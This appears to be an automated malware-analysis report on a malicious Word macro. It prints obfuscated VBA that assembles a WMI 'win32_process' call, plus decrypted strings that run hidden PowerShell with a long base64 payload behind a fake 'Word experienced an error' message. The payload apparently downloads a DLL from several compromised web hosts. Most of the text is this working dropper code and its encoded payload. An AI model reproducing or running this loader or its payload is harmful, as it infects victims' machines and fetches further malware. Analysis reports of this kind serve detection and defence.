ahQBZsg yw ahAD0sg yw ahAKAsg yw ahAoAsg yw ahCcAsg yw ahVAAsg yw ahnACsg yw ahsAJsg yw ahwA2sg yw ahADUsg yw ahAJwsg yw ahApAsg yw ahCsAsg yw ahJwBsg yw ahRACsg yw ahcAKsg yw ahQA7sg yw ahACAsg yw ahAIAsg yw ahAkAsg yw ahHAAsg yw ahZwBsg yw ahCADsg yw ahoAOsg yw ahgAisg yw ahAGMsg yw ahAcgsg yw ahBgAsg yw ahEUAsg yw ahYQBsg yw) -> 21932

                                                                      Create

                                                                      		SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwB,,) -> 0

                                                                      Twt08i5xpa9fd0

                                                                      L1e1dxo2wbinf3l6

                                                                      rlKgn

                                                                      Paragraphs

                                                                      igIuH

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      QgrUG

                                                                      StringsDecrypted Strings
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ahpsg yw ah"
                                                                      "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "sg yw ahsg yw ah"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      LineInstructionMeta Information
                                                                      2

                                                                      Function Xqcxarraokjbi()

                                                                      3

                                                                      On Error Resume Next

                                                                      executed
                                                                      4

                                                                      V1 = O9eax2mx6bn5xuv + Bcur5699z4d.Content + Bud375u79tqnjtr8hp

                                                                      O9eax2mx6bn5xuv

                                                                      Content

                                                                      Bud375u79tqnjtr8hp

                                                                      5

                                                                      Goto hnsxGG

                                                                      6

                                                                      Dim vpWmJA as Paragraph

                                                                      7

                                                                      Set HwQjGFBhp = bebkDqAH

                                                                      bebkDqAH

                                                                      8

                                                                      For Each vpWmJA in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      9

                                                                      Set yVvECoEYV = EWTFmUdCA

                                                                      EWTFmUdCA

                                                                      10

                                                                      If Left(vpWmJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      11

                                                                      hnsxGG = vpWmJA.Range.ListFormat.ListString

                                                                      Range

                                                                      12

                                                                      Elseif InStr(vpWmJA.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      13

                                                                      elbdiLVN = vpWmJA.Range.Text

                                                                      Range

                                                                      14

                                                                      elbdiLVN = Replace(saw, "sjgwb", "hqkwjbjdasd" & hnsxGG)

                                                                      Replace

                                                                      saw

                                                                      15

                                                                      vpWmJA.Range.Text = elbdiLVN

                                                                      Range

                                                                      16

                                                                      Set vpWmJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      17

                                                                      Endif

                                                                      18

                                                                      Set BdbvZ = ueWFHDCC

                                                                      ueWFHDCC

                                                                      19

                                                                      Next vpWmJA

                                                                      Paragraphs

                                                                      19

                                                                      hnsxGG:

                                                                      21

                                                                      U7 = "sg yw ahpsg yw ah"

                                                                      22

                                                                      Xa6pbm6di_vp9mwl = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"

                                                                      23

                                                                      Goto GHJmFFAIm

                                                                      24

                                                                      Dim ORjdHplF as Paragraph

                                                                      25

                                                                      Set twfalBEJ = yigPu

                                                                      yigPu

                                                                      26

                                                                      For Each ORjdHplF in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      27

                                                                      Set ATQXIsF = wTLHBUFzI

                                                                      wTLHBUFzI

                                                                      28

                                                                      If Left(ORjdHplF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      29

                                                                      GHJmFFAIm = ORjdHplF.Range.ListFormat.ListString

                                                                      Range

                                                                      30

                                                                      Elseif InStr(ORjdHplF.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      31

                                                                      JozvGJc = ORjdHplF.Range.Text

                                                                      Range

                                                                      32

                                                                      JozvGJc = Replace(saw, "sjgwb", "hqkwjbjdasd" & GHJmFFAIm)

                                                                      Replace

                                                                      saw

                                                                      33

                                                                      ORjdHplF.Range.Text = JozvGJc

                                                                      Range

                                                                      34

                                                                      Set ORjdHplF.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      35

                                                                      Endif

                                                                      36

                                                                      Set QxPrAc = oSnKJGCv

                                                                      oSnKJGCv

                                                                      37

                                                                      Next ORjdHplF

                                                                      Paragraphs

                                                                      37

                                                                      GHJmFFAIm:

                                                                      39

                                                                      Jziyk2numi4eksqusj = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"

                                                                      40

                                                                      Goto GLKaFEDcX

                                                                      41

                                                                      Dim kYUGGMJ as Paragraph

                                                                      42

                                                                      Set RpARJ = NVFQOFAXs

                                                                      NVFQOFAXs

                                                                      43

                                                                      For Each kYUGGMJ in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      44

                                                                      Set hHdBIMIgE = KoPDIC

                                                                      KoPDIC

                                                                      45

                                                                      If Left(kYUGGMJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      46

                                                                      GLKaFEDcX = kYUGGMJ.Range.ListFormat.ListString

                                                                      Range

                                                                      47

                                                                      Elseif InStr(kYUGGMJ.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      48

                                                                      TpXhGgIp = kYUGGMJ.Range.Text

                                                                      Range

                                                                      49

                                                                      TpXhGgIp = Replace(saw, "sjgwb", "hqkwjbjdasd" & GLKaFEDcX)

                                                                      Replace

                                                                      saw

                                                                      50

                                                                      kYUGGMJ.Range.Text = TpXhGgIp

                                                                      Range

                                                                      51

                                                                      Set kYUGGMJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      52

                                                                      Endif

                                                                      53

                                                                      Set iGMIJABIz = vlZuYFCC

                                                                      vlZuYFCC

                                                                      54

                                                                      Next kYUGGMJ

                                                                      Paragraphs

                                                                      54

                                                                      GLKaFEDcX:

                                                                      56

                                                                      Kdpt7ybnm0buk = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"

                                                                      57

                                                                      Goto QyjOFbQGB

                                                                      58

                                                                      Dim wNsHseJob as Paragraph

                                                                      59

                                                                      Set crnYCaC = mJzxEXG

                                                                      mJzxEXG

                                                                      60

                                                                      For Each wNsHseJob in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      61

                                                                      Set FdSuG = bssipAJC

                                                                      bssipAJC

                                                                      62

                                                                      If Left(wNsHseJob.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      63

                                                                      QyjOFbQGB = wNsHseJob.Range.ListFormat.ListString

                                                                      Range

                                                                      64

                                                                      Elseif InStr(wNsHseJob.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      65

                                                                      DrqvEr = wNsHseJob.Range.Text

                                                                      Range

                                                                      66

                                                                      DrqvEr = Replace(saw, "sjgwb", "hqkwjbjdasd" & QyjOFbQGB)

                                                                      Replace

                                                                      saw

                                                                      67

                                                                      wNsHseJob.Range.Text = DrqvEr

                                                                      Range

                                                                      68

                                                                      Set wNsHseJob.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      69

                                                                      Endif

                                                                      70

                                                                      Set HgufGDBpC = IpndaHM

                                                                      IpndaHM

                                                                      71

                                                                      Next wNsHseJob

                                                                      Paragraphs

                                                                      71

                                                                      QyjOFbQGB:

                                                                      73

                                                                      T_b71hsugbvq289o = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"

                                                                      Mid

                                                                      Name

                                                                      Application

                                                                      74

                                                                      Goto DMzpFn

                                                                      75

                                                                      Dim MscjBIE as Paragraph

                                                                      76

                                                                      Set AZyYMo = lscaG

                                                                      lscaG

                                                                      77

                                                                      For Each MscjBIE in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      78

                                                                      Set cLxQFB = wgusFA

                                                                      wgusFA

                                                                      79

                                                                      If Left(MscjBIE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      80

                                                                      DMzpFn = MscjBIE.Range.ListFormat.ListString

                                                                      Range

                                                                      81

                                                                      Elseif InStr(MscjBIE.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      82

                                                                      RxTZR = MscjBIE.Range.Text

                                                                      Range

                                                                      83

                                                                      RxTZR = Replace(saw, "sjgwb", "hqkwjbjdasd" & DMzpFn)

                                                                      Replace

                                                                      saw

                                                                      84

                                                                      MscjBIE.Range.Text = RxTZR

                                                                      Range

                                                                      85

                                                                      Set MscjBIE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      86

                                                                      Endif

                                                                      87

                                                                      Set jdDhS = HpOdl

                                                                      HpOdl

                                                                      88

                                                                      Next MscjBIE

                                                                      Paragraphs

                                                                      88

                                                                      DMzpFn:

                                                                      90

                                                                      Iybdpqjdde6_svpju7 = Kdpt7ybnm0buk + T_b71hsugbvq289o + Jziyk2numi4eksqusj + U7 + Xa6pbm6di_vp9mwl

                                                                      91

                                                                      Goto uRNYED

                                                                      92

                                                                      Dim GvZhcxcBE as Paragraph

                                                                      93

                                                                      Set WLdYLJOB = PAyxzTsC

                                                                      PAyxzTsC

                                                                      94

                                                                      For Each GvZhcxcBE in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      95

                                                                      Set RYtzeF = sVBjGLE

                                                                      sVBjGLE

                                                                      96

                                                                      If Left(GvZhcxcBE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      97

                                                                      uRNYED = GvZhcxcBE.Range.ListFormat.ListString

                                                                      Range

                                                                      98

                                                                      Elseif InStr(GvZhcxcBE.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      99

                                                                      mNAmBCKAC = GvZhcxcBE.Range.Text

                                                                      Range

                                                                      100

                                                                      mNAmBCKAC = Replace(saw, "sjgwb", "hqkwjbjdasd" & uRNYED)

                                                                      Replace

                                                                      saw

                                                                      101

                                                                      GvZhcxcBE.Range.Text = mNAmBCKAC

                                                                      Range

                                                                      102

                                                                      Set GvZhcxcBE.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      103

                                                                      Endif

                                                                      104

                                                                      Set kFOCACABC = RmTjACo

                                                                      RmTjACo

                                                                      105

                                                                      Next GvZhcxcBE

                                                                      Paragraphs

                                                                      105

                                                                      uRNYED:

                                                                      107

                                                                      H7kfpfj7v13k0 = Yvxv3g2kutodnaylkq(Iybdpqjdde6_svpju7)

                                                                      108

                                                                      Goto clyLjDhC

                                                                      109

                                                                      Dim VrghdcJA as Paragraph

                                                                      110

                                                                      Set kyTwIN = zjQpkF

                                                                      zjQpkF

                                                                      111

                                                                      For Each VrghdcJA in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      112

                                                                      Set xmKhhI = ClofCvn

                                                                      ClofCvn

                                                                      113

                                                                      If Left(VrghdcJA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      114

                                                                      clyLjDhC = VrghdcJA.Range.ListFormat.ListString

                                                                      Range

                                                                      115

                                                                      Elseif InStr(VrghdcJA.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      116

                                                                      LATJAGVFG = VrghdcJA.Range.Text

                                                                      Range

                                                                      117

                                                                      LATJAGVFG = Replace(saw, "sjgwb", "hqkwjbjdasd" & clyLjDhC)

                                                                      Replace

                                                                      saw

                                                                      118

                                                                      VrghdcJA.Range.Text = LATJAGVFG

                                                                      Range

                                                                      119

                                                                      Set VrghdcJA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      120

                                                                      Endif

                                                                      121

                                                                      Set IyCjJCAKS = tFspDCJEJ

                                                                      tFspDCJEJ

                                                                      122

                                                                      Next VrghdcJA

                                                                      Paragraphs

                                                                      122

                                                                      clyLjDhC:

                                                                      124

                                                                      Set W71k24g1fo31hq05ui = CreateObject(H7kfpfj7v13k0)

                                                                      CreateObject("winmgmts:win32_process")

                                                                      executed
                                                                      125

                                                                      Goto CJIuIYEKI

                                                                      126

                                                                      Dim djUnAEBd as Paragraph

                                                                      127

                                                                      Set nATRHnACI = rknGHpIJ

                                                                      rknGHpIJ

                                                                      128

                                                                      For Each djUnAEBd in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      129

                                                                      Set PyQuEPBH = LGONCIz

                                                                      LGONCIz

                                                                      130

                                                                      If Left(djUnAEBd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      131

                                                                      CJIuIYEKI = djUnAEBd.Range.ListFormat.ListString

                                                                      Range

                                                                      132

                                                                      Elseif InStr(djUnAEBd.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      133

                                                                      gnnIFFf = djUnAEBd.Range.Text

                                                                      Range

                                                                      134

                                                                      gnnIFFf = Replace(saw, "sjgwb", "hqkwjbjdasd" & CJIuIYEKI)

                                                                      Replace

                                                                      saw

                                                                      135

                                                                      djUnAEBd.Range.Text = gnnIFFf

                                                                      Range

                                                                      136

                                                                      Set djUnAEBd.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      137

                                                                      Endif

                                                                      138

                                                                      Set AYQZHEBI = chPFBOFy

                                                                      chPFBOFy

                                                                      139

                                                                      Next djUnAEBd

                                                                      Paragraphs

                                                                      139

                                                                      CJIuIYEKI:

                                                                      141

                                                                      KK = Yvxv3g2kutodnaylkq(Mid(V1, (4), Len(V1)))

                                                                      Mid

                                                                      Len(" sg yw ahsg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ah/sg yw ahcsg yw ah sg yw ahmsg yw ah^sg yw ahssg yw ah^sg yw ahgsg yw ah sg yw ah%sg yw ahusg yw ahssg yw ahesg yw ahrsg yw ahnsg yw ahasg yw ahmsg yw ahesg yw ah%sg yw ah sg yw ah/sg yw ahvsg yw ah sg yw ahWsg yw ahosg yw ah^sg yw ahrsg yw ahdsg yw ah sg yw ahesg yw ahxsg yw ahpsg yw ah^sg yw ahesg yw ahrsg yw ahisg yw ahesg yw ahnsg yw ah^sg yw ahcsg yw ahesg yw ahdsg yw ah sg yw ahasg yw ahnsg yw ah sg yw ahesg yw ahrsg yw ah^sg yw ahrsg yw ahosg yw ahrsg yw ah sg yw ahtsg yw ahrsg yw ahysg yw ahisg yw ah^sg yw ahnsg yw ahgsg yw ah sg yw ahtsg yw ahosg yw ah sg yw ahosg yw ahpsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ahtsg yw ahhsg yw ah^sg yw ahesg yw ah sg yw ahfsg yw ahisg yw ah^sg yw ahlsg yw ahesg yw ah.sg yw ah sg yw ah&sg yw ah sg yw ahpsg yw ah^sg yw ahosg yw ahwsg yw ahesg yw ah^sg yw ahrsg yw ahssg yw ah^sg yw ahhsg yw ahesg yw ah^sg yw ahlsg yw ahlsg yw ah^sg yw ah sg yw ah-sg yw ahwsg yw ah sg yw ahhsg yw ahisg yw ah^sg yw ahdsg yw ahdsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ah-sg yw ah^sg yw ahesg yw ah^sg yw ahnsg yw ahcsg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah IAAsg yw ahgAFsg yw ahMARsg yw ahQBUsg yw ahAC0sg yw ahAaQsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahgACsg yw ahAAdsg yw ahgBhsg yw ahAHIsg yw ahASQsg yw ahBhAsg yw ahEIAsg yw ahTABsg yw ahFADsg yw ahoAUsg yw ahABHsg yw ahAEIsg yw ahAIAsg yw ahAgAsg yw ahCgAsg yw ahIABsg yw ahbAFsg yw ahQAWsg yw ahQBQsg yw ahAGUsg yw ahAXQsg yw ahAoAsg yw ahCIAsg yw ahewAsg yw ahyAHsg yw ah0Aesg yw ahwA0sg yw ahAH0sg yw ahAewsg yw ahA1Asg yw ahH0Asg yw ahewAsg yw ahxAHsg yw ah0Aesg yw ahwAwsg yw ahAH0sg yw ahAewsg yw ahAzAsg yw ahH0Asg yw ahIgAsg yw ahgACsg yw ah0AZsg yw ahgAnsg yw ahAC4sg yw ahARAsg yw ahBpAsg yw ahHIAsg yw ahJwAsg yw ahsACsg yw ahcAbsg yw ahQAusg yw ahAEksg yw ahATwsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahTAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahARQsg yw ahBDAsg yw ahFQAsg yw ahbwBsg yw ahSAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahAUwsg yw ahB0Asg yw ahCcAsg yw ahLAAsg yw ahnAEsg yw ahUAJsg yw ahwApsg yw ahACksg yw ahAOwsg yw ahAgAsg yw ahHMAsg yw ahRQBsg yw ahUACsg yw ahAAKsg yw ahAAnsg yw ahADIsg yw ahAOQsg yw ahB4Asg yw ahCcAsg yw ahKwAsg yw ahnAGsg yw ahQAJsg yw ahwArsg yw ahACcsg yw ahANAsg yw ahBNAsg yw ahCcAsg yw ahKQAsg yw ahgACsg yw ahAAKsg yw ahAAgsg yw ahAFssg yw ahAVAsg yw ahBZAsg yw ahHAAsg yw ahRQBsg yw ahdACsg yw ahgAIsg yw ahgB7sg yw ahADcsg yw ahAfQsg yw ahB7Asg yw ahDEAsg yw ahfQBsg yw ah7ADsg yw ahIAfsg yw ahQB7sg yw ahADMsg yw ahAfQsg yw ahB7Asg yw ahDYAsg yw ahfQBsg yw ah7ADsg yw ahQAfsg yw ahQB7sg yw ahADAsg yw ahAfQsg yw ahB7Asg yw ahDUAsg yw ahfQAsg yw ahiACsg yw ahAALsg yw ahQBmsg yw ahACcsg yw ahATgsg yw ahBhAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahkAcsg yw ahwAnsg yw ahACwsg yw ahAJwsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahuAEsg yw ah4ARsg yw ahQB0sg yw ahACcsg yw ahALAsg yw 